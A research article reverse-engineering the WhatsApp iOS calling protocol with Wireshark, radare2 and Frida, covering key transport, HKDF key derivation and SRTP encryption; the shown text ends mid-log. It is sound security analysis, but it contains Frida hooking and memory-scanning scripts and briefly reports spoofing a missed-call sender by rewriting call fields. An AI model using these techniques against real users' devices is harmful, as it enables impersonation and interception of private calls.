Analyzing WhatsApp Calls with Wireshark, radare2 and Frida

Original text by schirrmacher

In this article I want to demonstrate how I revealed parts of the WhatsApp VoIP protocol with the help of a jailbroken iOS device and a set of forensic tools. WhatsApp has received a lot of attention due to security vulnerabilities and hacks, which makes it an interesting target for teaching security analysis.

While there is an official white paper describing the encryption of WhatsApp, there is no detailed overview of how its protocols work or how the security features are implemented. Consequently, there is no foundation for serious security-related analysis.

My research is based on three steps:

  1. Analysis of the network traffic.
  2. Analysis of the binary files.
  3. Analysis of the runtime behavior.


I used the following tools for analyzing an iOS WhatsApp client: Wireshark, radare2, the Hopper Disassembler, Frida, and bfdecrypt.

How I installed a jailbreak on my iOS device is out of scope.

Network Traffic Analysis

This part examines the network traffic of the WhatsApp client during a call, which was recorded with Wireshark. For recording the network traffic of the iOS device, I created a remote virtual network interface. The shell command is as follows (works on macOS), where <deviceUUID> has to be replaced with the UUID of the inspected iOS device:

rvictl -s <deviceUUID>

Wireshark detects the usage of Session Traversal Utilities for NAT (STUN). STUN is a signaling protocol that handles the steps necessary for establishing a peer-to-peer connection between clients. There are also many TCP and UDP packets in the Wireshark recording which could not be associated with a high-level protocol.

TCP packets are exchanged between the inspected WhatsApp client and multiple WhatsApp servers. The UDP packets are exchanged between the caller and the callee; hundreds of those UDP packets are sent within a minute. Since the WhatsApp white paper mentions the usage of the Secure Real-time Transport Protocol (SRTP), it stands to reason that these UDP packets are SRTP packets containing the call data. The protocol adds encryption, message authentication and integrity, and protection against replay attacks to Real-time Transport Protocol (RTP) packets.

The following listing shows an SRTP packet in hexadecimal representation, which was sent by the caller to the callee. It contains header fields from RTP, which forms the foundation of SRTP.

The first four bytes (red) contain seven RTP header fields. They can be inspected by looking at their binary representation:

0x8078001e =

0b10_0_0_0000_0_1111000_0000000000011110

The first two bits contain the RTP version (V), which is equal to version two in this case. The third bit, the padding field (P), indicates that no padding is included in the packet. The fourth bit, the extension field (X), indicates that no extension header follows the fixed RTP header. Bits five to eight, the CSRC count (CC), show that no contributing source (CSRC) identifiers follow the fixed header. CSRCs are a list of identifiers indicating which sources contributed to the payload of an SRTP packet. The marker bit (M) at position nine is also set to zero; it can be used to mark frame boundaries of the packet stream.

The next seven bits contain the payload type (PT), which is equal to the decimal value 120 in this case. This payload type is not defined by the RTP or SRTP standard; it falls into the dynamic range and might be a custom value chosen by WhatsApp. The last 16 bits contain the sequence number (SEQ) of the given packet. The RTP standard recommends randomizing the initial value of the sequence number. WhatsApp does not apply this recommendation, since the packet sequence numbers count up from zero, as can be seen from the Wireshark recordings.

The next four bytes (blue) represent the timestamp of the packet. The four bytes after that (green) represent the synchronization source (SSRC), an identifier used for distinguishing call sessions running in parallel. The remaining bytes represent the payload, which probably contains audio data of the call.
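Following RFC 3550, the 32-bit header word can also be unpacked programmatically. A small sketch in JavaScript (the function name is hypothetical):

```javascript
// Split the first 32-bit word of an RTP header into its seven fields,
// per RFC 3550: V(2) P(1) X(1) CC(4) M(1) PT(7) SEQ(16).
function parseRtpHeaderWord(word) {
  return {
    version: (word >>> 30) & 0x3,      // V: 2 bits
    padding: (word >>> 29) & 0x1,      // P: 1 bit
    extension: (word >>> 28) & 0x1,    // X: 1 bit
    csrcCount: (word >>> 24) & 0xf,    // CC: 4 bits
    marker: (word >>> 23) & 0x1,       // M: 1 bit
    payloadType: (word >>> 16) & 0x7f, // PT: 7 bits
    sequenceNumber: word & 0xffff      // SEQ: 16 bits
  };
}

// The observed first word of the WhatsApp packet:
const header = parseRtpHeaderWord(0x8078001e);
// header.version === 2, header.payloadType === 120, header.sequenceNumber === 30
```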

We know that WhatsApp applies SRTP for protecting calls. This is confirmed by the structure of the UDP packets exchanged between WhatsApp clients. The Wireshark recording shows that TCP packets are also sent from the iOS client to WhatsApp servers. These packets represent messages encrypted with the Noise Pipes Protocol, as we will see later.

Binary Analysis

The iOS WhatsApp client contains two main binary files: the WhatsApp application binary and the WhatsApp core framework. This part examines these binary files with the Hopper Disassembler and radare2. The binaries of iOS applications are encrypted when downloaded from the App Store, so for analyzing the iOS WhatsApp client, the security measures of Apple had to be circumvented. A jailbreak was installed on the inspected iOS device for accessing its files. In addition, the binary files of WhatsApp were decrypted with the tool bfdecrypt.

Here I demonstrate how I gathered information about underlying protocols, algorithms, and open source libraries WhatsApp uses. Open source libraries are especially interesting because they can easily be analyzed.


libsignal-protocol-c

WhatsApp uses the libsignal-protocol-c open source library, which implements the Signal Protocol. The protocol is based on the Double Ratchet Algorithm, which handles the encryption of WhatsApp messages. The library was identified by the following function names in the binaries:

r2 WhatsAppCore
[0x0082b517]> / _signal_
Searching 8 bytes in [0x0-0x654000]
hits: 33
0x00837a7b hit2_0 .il_key_data_from_signal_keydispatch_.
0x0083df33 hit2_1 ._torlice_signal_protocol_paramet.
0x008407c0 hit2_2 .d_fac_3key_signal_message_big.
0x00840d50 hit2_3 .mmetric_signal_protocol_paramet.
0x00840e70 hit2_4 .ob_signal_protocol_paramet.
0x00841492 hit2_5 .pre_key_signal_messagesigna.
0x008de24b hit2_6 .agc_reset_alice_signal_protocol_paramet.
0x008de274 hit2_7 .rs_create_alice_signal_protocol_paramet.
0x008de440 hit2_8 .bitno_MRDTX_bob_signal_protocol_paramet.
0x008de467 hit2_9 .ters_create_bob_signal_protocol_paramet.
0x008e311c hit2_10 .pre_big_pre_key_signal_message_copy_pr.
0x008e3139 hit2_11 .ge_copy_pre_key_signal_message_create_.
0x008e3158 hit2_12 ._create_pre_key_signal_message_deserial.
0x008e317c hit2_13 .rialize_pre_key_signal_message_destroy.

libsrtp


WhatsApp uses libsrtp for implementing the Secure Real-time Transport Protocol. The symbol names of the library’s functions are stripped from the binaries. Nevertheless, the application binary contains strings which reference libsrtp:

r2 WhatsApp
[0x1001ada34]> / libsrtp
0x100ee5546 hit1_0 .rc %08XUnknown libsrtp error %duns.
0x100ee57eb hit1_1 .d to initialize libsrtp: %sFailed to r.
0x100ee580a hit1_2 .led to register libsrtp deinit.Failed .
0x100ee5831 hit1_3 .to deinitialize libsrtp: %sAES_CM_128_.
0x100ee5883 hit1_4 .ck crypto Init libsrtp. create pool. .
0x100f07b80 hit1_5 . packet: %slibsrtpstat test%s: c.

In addition, the binaries contain string constants which can also be found in the source code of libsrtp, such as “cloning stream (SSRC: 0x%08x)”:

r2 WhatsApp
[0x1013ddb4f]> / cloning stream
Searching 14 bytes in [0x100000000-0x100fb4000]
hits: 1
0x100f07823 hit7_0 .sent!srtp%s: cloning stream (SSRC: 0x%08x).


PJSIP

WhatsApp uses PJSIP, which implements multimedia communication, signaling, and the encoding of audio and video data. PJSIP also implements STUN, which was detected in the Wireshark recording as well. The library was identified by string constants in the binaries which contain debug information of PJSIP:

r2 WhatsApp
[0x1013ddb4f]> / pjmedia
Searching 7 bytes in [0x100000000-0x100fb4000]
hits: 180
0x100edd55f hit9_0 .io_piggyback.ccpjmedia_audio_piggyback.
0x100edd591 hit9_1 .r %d, stream %ppjmedia_audio_piggyback.
0x100edd5d4 hit9_2 .d, tx_packet %dpjmedia_audio_piggyback.
0x100edd601 hit9_3 .ideo_enabled %dpjmedia_audio_piggyback.
0x100eddcf3 hit9_4 .ibyuv converterpjmedia_converter_creat.
0x100eddd21 hit9_5 .rter count = %dpjmedia_converter_creat.
0x100ede3e3 hit9_6 .rame, status=%dpjmedia_delay_buf_get_s.
0x100ede46e hit9_7 .%sec_delay_bufpjmedia_echo_create2: %.
0x100ede64d hit9_8 .eUnknown pjmedia-videodev error .
0x100ede90c hit9_9 .o errorUnknown pjmedia-audiodev error .
0x100edebba hit9_10 .ATENCY)Unknown pjmedia error %dUnspec.
0x100ee027e hit9_11 .queue.format.cpjmedia_format_get_vide.
0x100ee02ca hit9_12 .mat info for %dpjmedia_format_get_vide.
0x100ee1446 hit9_13 .c_buf too shortpjmedia_h26x_packetize .

mbed TLS

WhatsApp applies mbed TLS which implements the TLS protocol. The library was identified by the following function names in the binaries:

r2 WhatsAppCore
[0x0082b517]> / mbedtls
Searching 7 bytes in [0x814000-0x934000]
hits: 41
0x008e299b hit5_0 .TLSErrorDomain_mbedtls_aes_crypt_cbc_.
0x008e29b2 hit5_1 ._aes_crypt_cbc_mbedtls_aes_crypt_cfb12.
0x008e29cc hit5_2 .s_crypt_cfb128_mbedtls_aes_crypt_cfb8.
0x008e29e4 hit5_3 .aes_crypt_cfb8_mbedtls_aes_crypt_ctr_.
0x008e29fb hit5_4 ._aes_crypt_ctr_mbedtls_aes_crypt_ecb_.
0x008e2a12 hit5_5 ._aes_crypt_ecb_mbedtls_aes_decrypt_mb.
0x008e2a27 hit5_6 .ls_aes_decrypt_mbedtls_aes_encrypt_mb.
0x008e2a3c hit5_7 .ls_aes_encrypt_mbedtls_aes_free_mbedt.
0x008e2a4e hit5_8 .edtls_aes_free_mbedtls_aes_init_mbedt.
0x008e2a60 hit5_9 .edtls_aes_init_mbedtls_aes_setkey_dec.
0x008e2a78 hit5_10 .aes_setkey_dec_mbedtls_aes_setkey_enc.
0x008e2a90 hit5_11 .aes_setkey_enc_mbedtls_cipher_auth_dec.
0x008e2aad hit5_12 .r_auth_decrypt_mbedtls_cipher_auth_enc.
0x008e2aca hit5_13 .r_auth_encrypt_mbedtls_cipher_check_ta.


XMPP

WhatsApp uses the Extensible Messaging and Presence Protocol (XMPP) for exchanging messages asynchronously between clients in the form of XML stanzas. This is supported by the fact that many class names in the binaries contain keywords relating to the protocol:

r2 WhatsApp
[0x1013ddb4f]> / XMPP
Searching 4 bytes in [0x1013ac000-0x1014b4000]
hits: 150
Searching 4 bytes in [0x100fb4000-0x1013ac000]
hits: 150
Searching 4 bytes in [0x100000000-0x100fb4000]
hits: 396
0x1013d05b5 hit12_0 .@_OBJC_CLASS_$_XMPPAckStanza@_.
0x1013d05d6 hit12_1 .@_OBJC_CLASS_$_XMPPBinaryCoder.
0x1013d05fa hit12_2 .@_OBJC_CLASS_$_XMPPCallStanza.
0x1013d0624 hit12_3 .@_OBJC_CLASS_$_XMPPChatStateStanza.
0x1013d064b hit12_4 .@_OBJC_CLASS_$_XMPPConnection.
0x1013d0679 hit12_5 .@_OBJC_CLASS_$_XMPPError.
0x1013d069e hit12_6 .@_OBJC_CLASS_$_XMPPGDPRDeleteReport.
0x1013d06cd hit12_7 .@_OBJC_CLASS_$_XMPPGDPRGetReportSta.
0x1013d0707 hit12_8 .@_OBJC_CLASS_$_XMPPGDPRRequestRepor.
0x1013d0736 hit12_9 .@_OBJC_CLASS_$_XMPPIQStanza.
0x1013d0762 hit12_10 .@_OBJC_CLASS_$_XMPPMessageStanza.
0x1013d0787 hit12_11 .@_OBJC_CLASS_$_XMPPMessageStatusCha.
0x1013d07b9 hit12_12 .@_OBJC_CLASS_$_XMPPMultiReceipt.
0x1013d07dc hit12_13 .@_OBJC_CLASS_$_XMPPNotificationStan.

Noise Protocol Framework

According to the WhatsApp white paper, the Noise Protocol Framework is used for securing the communication between clients and servers. The Noise Protocol Framework was developed for constructing easy-to-use cryptographic protocols from a set of small building blocks. To be more precise, WhatsApp applies the Noise Pipes Protocol, which is derived from the Noise Protocol Framework. The following static string constants can be found in the WhatsApp binaries:

  • “Noise_XX_25519_AESGCM_SHA256”,
  • “Noise_IK_25519_AESGCM_SHA256”,
  • “Noise_XXfallback_25519_AESGCM_SHA256”.

These string constants describe handshake patterns implemented by WhatsApp clients. The first string is referenced within a class called WANoiseFullHandshake. The second string is referenced within a class called WANoiseResumeHandshake. The last string is referenced within a class called WANoiseFallbackHandshake. How these protocols work in detail is out of scope.
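These names follow the Noise specification’s naming convention: handshake pattern, DH function, cipher, and hash joined by underscores. A small sketch (the function name is hypothetical):

```javascript
// Decompose a Noise protocol name into its components, as defined by
// the Noise specification: Noise_<pattern>_<dh>_<cipher>_<hash>.
function parseNoiseName(name) {
  const [prefix, pattern, dh, cipher, hash] = name.split("_");
  return { prefix, pattern, dh, cipher, hash };
}

const p = parseNoiseName("Noise_XXfallback_25519_AESGCM_SHA256");
// p.pattern === "XXfallback", p.dh === "25519",
// p.cipher === "AESGCM", p.hash === "SHA256"
```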

Runtime Analysis

This part examines the runtime behavior of the iOS WhatsApp client with the help of Frida. Frida is a command-line tool which creates JavaScript hooks for functions of a mobile application. These hooks can be utilized for observing or manipulating parameters and return values of called functions.

Key Transport

This part outlines how the key transport of the WhatsApp VoIP protocol works. According to the WhatsApp white paper, for encrypting a VoIP call, the “initiator generates a random 32-byte SRTP master secret”. The caller then “transmits an encrypted message to the recipient that signals an incoming call, and contains the SRTP master secret”. This information is utilized for reconstructing the key transport, i.e. the transport of the master secret to the callee.

As a starting point, I traced functions containing the word “secret”:

frida-trace -U WhatsApp -m "*[* *Secret*]" -m "*[* *secret*]"

When a WhatsApp call is initiated, the method deriveSecretsFromInputKeyMaterial of the class WAHKDF is called:

deriveSecretsFromInputKeyMaterial: 0x121e08a20
salt: 0x0
info: 0x121e07840
outputLength: 0x2e
withMessageVersion: 0x3

The input values 0x121e08a20 and 0x121e07840 are pointers to Objective-C objects. Frida allows creating proxy Objective-C objects from pointers in JavaScript. The function hook of deriveSecretsFromInputKeyMaterial was used for printing debug descriptions of the objects:

  onEnter: function (log, args, state) {
    log("+[WAHKDF deriveSecretsFromInputKeyMaterial: " +
            ObjC.Object(args[2]).toString() + "\n" +
        " salt: " + ObjC.Object(args[3]).toString() + "\n" +
        " info: " + ObjC.Object(args[4]).toString() + "\n" +
        " bytes: " + args[5].toInt32() + "\n" +
        " withMessageVersion: " + args[6].toInt32() + "\n]");
  },

The output of the script can be seen in the following:

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6> 
salt : nil
info : <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>
bytes: 46
withMessageVersion : 3

The first and third parameters appear to be NSData objects containing static byte buffers. The first parameter has a length of 32 bytes, like the master secret described in the WhatsApp white paper. The third parameter is an ASCII string representing the JID of the caller. We will see in the following that the first parameter is indeed the master secret.
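The info bytes shown above are plain ASCII; decoding the hex dump yields the caller’s JID directly:

```javascript
// Hex bytes of the info parameter, as recorded in the trace output above.
const infoHex = "3439313539303537373136323040732e77686174736170702e6e6574";

// Decoding them as ASCII reveals the caller's JID.
const jid = Buffer.from(infoHex, "hex").toString("ascii");
console.log(jid); // → "4915905771620@s.whatsapp.net"
```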

Encryption of the Master Secret

According to the WhatsApp white paper, the master secret is essential for protecting a call session. This is why it has to be transported securely to the callee. For observing how the master secret is processed, I traced function calls containing keywords relevant for encryption:

frida-trace -U WhatsApp -m "*[* *crypt*]" -i "*crypt*"

When a call is initiated, the function signal_encrypt of the libsignal-protocol-c library is called. The following shows the signal_encrypt function header:

int signal_encrypt(signal_context *context,
                   signal_buffer **output,
                   int cipher,
                   const uint8_t *key, size_t key_len,
                   const uint8_t *iv, size_t iv_len,
                   const uint8_t *plaintext, size_t plaintext_len);

The plaintext parameter was read with the Frida hook of signal_encrypt:

The first four bytes are used for serializing the master secret with protocol buffers. The following bytes represent the master secret. The last 13 bytes represent the encryption padding. I discovered that the plaintext is encrypted with AES-256 in CBC mode. The encryption keys are derived by the Double Ratchet Algorithm which is part of the Signal Protocol. The inner workings of libsignal-protocol-c and the Signal Protocol are not investigated in this article. The output of signal_encrypt is represented by the following bytes:

The output carries more bytes because an authentication tag is appended to the message, which is computed with HMAC-SHA256.

This part revealed the first part of the WhatsApp VoIP protocol. The master secret is serialized, padded and encrypted with a 256-bit AES key in CBC mode. The encryption key, the IV as well as the authentication key are derived by the libsignal-protocol-c library, which implements the Signal Protocol.

Preparing the Master Secret

In the following, I demonstrate how the encrypted master secret is processed. I traced functions containing the keyword “signal”:

frida-trace -U WhatsApp -i "*signal*"

The Frida command reveals that the function textsecure__signal_message__pack processes the encrypted master secret. The function creates a Signal message containing the encrypted master secret and parameters relevant for the Signal Protocol:

The gray bytes are used for serializing the Signal message. The blue bytes represent the sender ratchet key. The red byte represents the previous message counter, followed by the message counter (orange). The remaining bytes (green) represent the encrypted master secret.

When tracing XMPP related Objective-C functions, we can see that a method named writeNoiseFrameToSocketWithPayload of the class XMPPStream is called. This method sends XMPP messages, which are encrypted with the Noise Pipes Protocol, via TCP to WhatsApp servers. I revealed the content of the payload parameter:

It is a binary XMPP message containing the Signal message created above. For dissecting the message, I traced a class named XMPPBinaryCoder. This class has a method called serialize, which creates the binary representation of an XMPP stanza. When printing out its parameters, I can see a variety of key-value pairs which are added to the XMPP message:

-[XMPPBinaryCoder serialize:
[call from='49**********'
[offer call-id='45D7827C624353A70084AED9B8C509D3'

[net medium='3']
[capability ver='1' {5b}]
[encopt keygen='2']
[enc v='2' type='pkmsg' {201b}]
] compressed: 0x0]

I was able to fake the indication of a missed call from Alice on Bob’s device, even though the call was initiated by Mallory. This was possible by overwriting the call-creator and from parameters with Alice’s JID. However, the name Mallory is still shown in the message (“with Mallory”). When Bob responds to the notification, he starts a call with Alice instead of Mallory. I think further research is required for analyzing the manipulation of the initial call message.

This part revealed how the encrypted master secret is processed by WhatsApp. The encrypted master secret is packed into a Signal message, which is added to a binary XMPP stanza. The XMPP stanza also contains the call ID and the JIDs of the caller and the callee.

Transmitting the Master Secret to the Callee

According to the WhatsApp white paper, “clients use Noise Pipes with Curve25519, AESGCM, and SHA256 from the Noise Protocol Framework for long running interactive connections”. When tracing functions containing keywords relating to the Noise Protocol Framework, I can see that a class named WANoiseStreamCipher is used for encrypting traffic sent to WhatsApp servers. This class has a method called encryptPlaintext. The plaintext value after initiating a call is the XMPP message from above. The message is encrypted again with a function of the mbed TLS library called mbedtls_gcm_crypt_and_tag. Moreover, mbedtls_gcm_setkey is called with a key size of 256 bits, which means that AES-256-GCM is applied. The encryption key is derived by the Noise Pipes Protocol, which is not investigated further in this article. The encrypted plaintext is sent via TCP to a WhatsApp server, as revealed by the Wireshark recordings. The server then forwards the message to the callee for initiating the call.

Key Derivation

This part explains how the key material, used for encrypting WhatsApp calls, is created by a key derivation function (KDF). The results of this part are retrieved with the help of Frida by tracing a class called WAHKDF and the library libcommonCrypto. The WAHKDF class is applied for deriving keys, salts and nonces for initializing SRTP streams. Its method deriveSecretsFromInputKeyMaterial is called ten times before a call starts:

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6>, salt: nil, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 46, withMessageVersion: 3] => result: <4633c47f 94d5ed59 93a6dba8 514d5fb8 5092ba90 4256f8d3 4d56e72e 665bcd4c 5b6c418b db811e7f 84a70c83 f401>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <09a38e76 fe90e4f1 26ed66d0 5a6783ba d48776b6 1daaf7c9 39c005ea 2d8ccdf6>, salt: nil, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 46, withMessageVersion: 3] => result: <a174670a e25d8138 4de0ed3b f4ce7f76 c62c1d00 9ece6573 2ecb497b 1f6ed09c 18c444b9 c180fbd3 51713739 761c>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <00000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <0ec654fd>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <01000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <a060fa73>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <04000000>, info: <34393135 39303537 37313632 3040732e 77686174 73617070 2e6e6574>, bytes: 4, withMessageVersion: 3] => result: <b17d7f33>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <00000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <f51e66eb>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <01000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <ee328049>

+[WAHKDF deriveSecretsFromInputKeyMaterial: <34354437 38323743 36323433 35334137 30303834 41454439 42384335 30394433>, salt: <04000000>, info: <34393137 ******** ******** ******** ******** 6170702e 6e6574>, bytes: 4, withMessageVersion: 3] => result: <c75099f3>

The method creates encryption keys, salts and nonces based on the master secret and the JID of the call participants. The resulting values are used for initializing six SRTP streams, three for each call direction.

The following code snippet shows the reconstruction of the key derivation function written in JavaScript:

const crypto = require("crypto");

// master secret (input key material recorded with Frida)
const keyMaterial = Buffer.from(
  "09a38e76fe90e4f126ed66d05a6783bad48776b61daaf7c939c005ea2d8ccdf6",
  "hex");
// JID parameter (info)
const info = "3439313539303537373136323040732e77686174736170702e6e6574";
// a nil salt corresponds to a zero-filled buffer of hash length (RFC 5869)
const salt = Buffer.alloc(32);

// extract step
const initialKey = crypto.createHmac("sha256", salt)
                         .update(keyMaterial).digest();
// expand step: 46 output bytes require two HMAC blocks
const temp1 = crypto.createHmac("sha256", initialKey)
                    .update(Buffer.from(info + "01", "hex")).digest();
const temp2 = Buffer.from(temp1.toString("hex") + info + "02", "hex");
const temp3 = crypto.createHmac("sha256", initialKey)
                    .update(temp2).digest();
const result = Buffer.concat([temp1, temp3.slice(0, 14)]);

console.log(result.toString("hex"));
// 4633c47f94d5ed5993a6dba8514d5fb85092ba904256f8d34d56e72e665bcd4c5b6c418bdb811e7f84a70c83f401

This code snippet represents the key derivation for initializing a single SRTP stream. The input parameters and the function’s output were recorded with Frida. For reconstructing the KDF algorithm, the inputs and outputs of hash functions from the libcommonCrypto library were analyzed. Three HMAC-SHA256 computations are applied for deriving the final key. I found out that the KDF is based on RFC 5869.

Call Initialization

SRTP, which is implemented by libsrtp, is applied by WhatsApp for encrypting audio data exchanged between WhatsApp clients during a VoIP call. Unfortunately, the symbols of the libsrtp library are stripped from the WhatsApp binaries. This is why we cannot trace the library’s functions by their symbol name. Instead, I followed a different approach for analyzing functions of the libsrtp library.

Many functions of the libsrtp library contain debug statements, which carry information about internal library processing. These debug statements were utilized for identifying functions of the library. I searched for string constants in the data segment of the WhatsApp binaries which can also be found in libsrtp. Then I searched for function bodies in the binaries, which are referencing these string constants. When I identified a function of libsrtp in the binaries, I copied the first 12 bytes of its hexadecimal representation. Then I used Frida for searching the hexadecimal representation in memory. This way I revealed the function’s start address which can be traced by Frida.

As an example, I explain how I revealed the usage of a libsrtp library function called srtp_aes_icm_context_init. This function is used for initializing encrypted SRTP streams, based on AES-ICM. The other functions which are analyzed in this part were traced by applying the same methodology.

The implementation of srtp_aes_icm_context_init contains two debug statements:

debug_print(srtp_mod_aes_icm, "key:  %s",
            srtp_octet_string_hex_string(key, base_key_len));
debug_print(srtp_mod_aes_icm, "offset: %s", v128_hex_string(&c->offset));

We can see that the string constants in the debug_print calls occur as references in the application binaries of WhatsApp. When searching the reference location, it is possible to associate the string constants with a function which encloses them. The function containing the references was revealed with the Hopper Disassembler:

int sub_100bbda00(int arg0, int arg1) {
  r31 = r31 - 0x60;
  var_30 = r24;
  stack[-56] = r23;
  var_20 = r22;
  stack[-40] = r21;
  var_10 = r20;
  stack[-24] = r19;
  saved_fp = r29;
  stack[-8] = r30;
  r19 = arg0;
  sub_100bbf094(arg0, arg1 + 0x10);
  r20 = r19 + 0x10;
  sub_100bbf094(r20, arg1 + 0x10);
  *(int16_t *)(r19 + 0x1e) = 0x0;
  *(int16_t *)(r19 + 0xe) = 0x0;
  if (*(int32_t *)dword_1012b5760 != 0x0) {
    sub_100bc085c(0x7, "%s: key:  %s\n");
  }
  if (*(int32_t *)0x1012b5760 != 0x0) {
    sub_100bc085c(0x7, "%s: offset: %s\n");
  }
  sub_100bbbffc(&var_40, r19 + 0x30);
  *(int32_t *)(r19 + 0xe0) = 0x0;
  return 0x0;
}
The two calls of sub_100bc085c contain the references to the debug string constants. When the location of the target function within the WhatsApp binaries is known, we still have to find its memory location at runtime. This is because Address Space Layout Randomization (ASLR) is applied on iOS devices: functions change their addresses every time a mobile application is launched.
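The effect of ASLR can be illustrated with plain address arithmetic. The runtime base address below is made up for illustration; only the static address of sub_100bbda00 comes from the Hopper listing:

```javascript
// ASLR shifts the whole image by a random slide at load time, so a
// function's runtime address is its static address plus that slide.
const staticBase = 0x100000000;  // preferred load address of the binary
const staticAddr = 0x100bbda00;  // sub_100bbda00 as shown by Hopper
const runtimeBase = 0x1015f4000; // hypothetical base observed at runtime

const slide = runtimeBase - staticBase;
const runtimeAddr = staticAddr + slide;
console.log("slide: 0x" + slide.toString(16));
```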

The following code snippet demonstrates how srtp_aes_icm_context_init can be located at runtime:

const apiResolver = new ApiResolver("objc");
const resolvedMatches = apiResolver.enumerateMatches(
  "+[NSURL URLWithUnicodeString:]"
);

const SCAN_SIZE = 100000;
const scanStart = resolvedMatches[0].address;
const scanResults = Memory.scanSync(
  scanStart,
  SCAN_SIZE,
  // first bytes of the hexadecimal representation of srtp_aes_icm_context_init
  "FF 83 01 D1 F8 5F 02 A9 F6 57 03 A9"
);

// srtp_err_status_t srtp_aes_icm_context_init(void *cv, const uint8_t *key)
const targetPointer = ptr(scanResults[0].address);
const targetFunction = new NativeFunction(targetPointer, "int", ["pointer", "pointer"]);

console.log("scan start: " + scanStart);
console.log("srtp_aes_icm_context_init: " + scanResults[0].address);

Interceptor.attach(targetFunction, {
  onEnter: function (args) {
    /*
      static srtp_err_status_t srtp_aes_icm_context_init(void *cv, const uint8_t *key)

      typedef struct {
          v128_t counter;                        // holds the counter value
          v128_t offset;                         // initial offset value
          v128_t keystream_buffer;               // buffers bytes of keystream
          srtp_aes_expanded_key_t expanded_key;  // the cipher key
          int bytes_in_buffer;                   // number of unused bytes in buffer
          int key_size;                          // AES key size + 14 byte SALT
      } srtp_aes_icm_ctx_t;
    */
    console.log("srtp_aes_icm_context_init " + args[0] + " key:");
    console.log(hexdump(args[1], {
      offset: 0,
      length: 16
    }));
  },
  onLeave: function (args) {}
});
The ApiResolver by Frida is applied for finding a known memory location (an anchor) from which I start a linear memory search. As an anchor, I use functions which are located close to the target function in the binaries and have a symbol name; if a function has a symbol name, it can easily be traced with Frida. This is why +[NSURL URLWithUnicodeString:] is resolved at the beginning of the script. When the anchor has been found, its location is used for starting a linear search in memory. The value of SCAN_SIZE should be chosen depending on the distance between the anchor and the target function. The pattern passed to Memory.scanSync contains the first 12 bytes of the target function as a hexadecimal value. Finally, a NativeFunction is created, which can be traced with Frida once the hexadecimal pattern is found. The function accepts two parameters: a pointer to the encryption context (cv) and a pointer to the encryption key (key). Before a call is started, srtp_aes_icm_context_init is called six times for initializing six SRTP streams. Two streams receive the master secret from above as key parameter.

The streams are encrypted with AES-ICM. The purpose of each stream is not clear. There is also a function called srtp_aes_icm_alloc, which was identified by the string constant “allocating cipher with key length %d”. The function accepts a key length parameter which has a value of 16 bytes for every stream. As a result, AES-128-ICM is applied for encrypting the SRTP streams. Although 46 bytes are derived with the key derivation function, only 30 bytes are actually used for initializing the first two streams. When the remaining 16 bytes are overwritten in memory, the call between two WhatsApp clients still works. This shows that these 16 bytes are not used at all!
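Assuming the standard SRTP layout of a 16-byte AES-128 key followed by a 14-byte session salt (RFC 3711), the 46 derived bytes would split as follows; the buffer here is only a stand-in for the real KDF output:

```javascript
// Stand-in for the 46-byte output of the key derivation function.
const derived = Buffer.alloc(46);

const aesKey = derived.slice(0, 16);    // 128-bit AES-ICM key
const srtpSalt = derived.slice(16, 30); // 14-byte session salt
const unused = derived.slice(30);       // 16 bytes that are apparently never used
```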

Call Encryption

There is a function called srtp_aes_icm_encrypt which is part of the libsrtp library. This function encrypts SRTP streams of WhatsApp clients based on AES-128-ICM. The function was identified by a reference to the following string constant in a debug statement: “block index: %d”.

The following represents the hexadecimal output of a single SRTP packet encrypted with srtp_aes_icm_encrypt:

The meaning of the first 12 bytes (red) was already explained above. The following bytes (blue) represent the actual SRTP payload. The last four bytes represent an authentication tag, which is investigated below. As there are six SRTP streams, there have to be different kinds of payloads. I could not identify the actual payload content transported by each stream.

Call Integrity

This part explains how the integrity of SRTP packets is protected. The libsrtp library contains a function named srtp_hmac_compute. This function computes authentication tags for SRTP packets exchanged between WhatsApp clients. srtp_hmac_compute could be located and traced with Frida by searching for a reference to the string constant found in the function’s implementation: “intermediate state: %s”.

The function header of srtp_hmac_compute can be seen in the following:

static srtp_err_status_t srtp_hmac_compute(void *statev,
                                           const uint8_t *message,
                                           int msg_octets,
                                           int tag_len,
                                           uint8_t *result)

srtp_hmac_compute applies HMAC-SHA1 for computing authentication tags. By tracing the function with Frida, I revealed the input message and the output result, as well as the value of tag_len for each sent SRTP packet. The following logs show the tag_len and the message parameters of srtp_hmac_compute during a call:

search srtp_hmac_compute in memory from: 0x1016380ac
found srtp_hmac_compute at: 0x10163b5f4

tag_len: 10
message: 81 ca 00 07 fe 67 2e 32 56 14 89 75 c5 c0 39 4a d3 a0 cd 48 8c 4b 61 8a 78 32 a7 89 1e b7 71 26 80 00 00 01

tag_len: 4
message: 00 00 00 00

tag_len: 10
message: 81 d0 00 02 fe 67 2e 32 b5 6f 93 8e 80 00 00 02

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 10
